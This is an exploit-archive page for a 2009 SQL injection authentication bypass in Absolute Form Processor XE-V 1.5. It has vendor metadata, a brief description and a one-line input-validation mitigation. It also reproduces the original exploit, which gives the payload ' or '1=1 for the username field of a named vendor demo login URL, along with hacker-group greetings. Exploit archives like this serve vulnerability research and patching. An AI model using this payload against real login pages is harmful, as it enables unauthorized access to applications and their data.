header-logo
Suggest Exploit
vendor:
Absolute Form Processor XE-V
by:
ThE g0bL!N(Dz)
9
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: Absolute Form Processor XE-V
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: NO
Related CWE: N/A
CPE: a:xigla:absolute_form_processor_xe-v
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Absolute Form Processor XE-V 1.5 (auth Bypass) Remote Sql Injecion

Absolute Form Processor XE-V 1.5 is vulnerable to an authentication bypass vulnerability due to improper sanitization of user-supplied input. An attacker can exploit this vulnerability to gain access to the application and execute arbitrary SQL queries.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

-----------------------------------------------------
-----------------------------------------------------
Absolute Form Processor XE-V 1.5 (auth Bypass) Remote Sql Injecion
-----------------------------------------------------
Founder: ThE g0bL!N(Dz)
Home: www.h4ckf0ru.com
Vive Algerie
# demo : http://www.xigla.com/absolutefp/demo/

Note : Les Algerien Rasa wa Li Yekhreb Fina Basa :)
-----------------------------------------------------------
-----------------------------------------------------------
exploit
-------
http://www.xigla.com/absolutefp/demo/login.asp
username:  ' or '1=1
Password:  ThE g0bL!N Or any Thing

demo:
-----
http://www.xigla.com/absolutefp/demo/login.asp
------------------------------------------------------
------------------------------------------------------
Thanx  :
           M0nSt3r-Dz - Master_FinaL - Dr-HTmL - Super Cristal- Hcoca_Man - Dreadful 
            Yassine_Enp- ViRuS_HaCkEr_Dz-Mr.JOoMJOoM-Naili- Str0ke - Milw0rm.com
------------------------------------------------------------------------------------
www.h4ckf0ru.com/vb/
------------------------------------------------------------------------------------

# milw0rm.com [2009-04-09]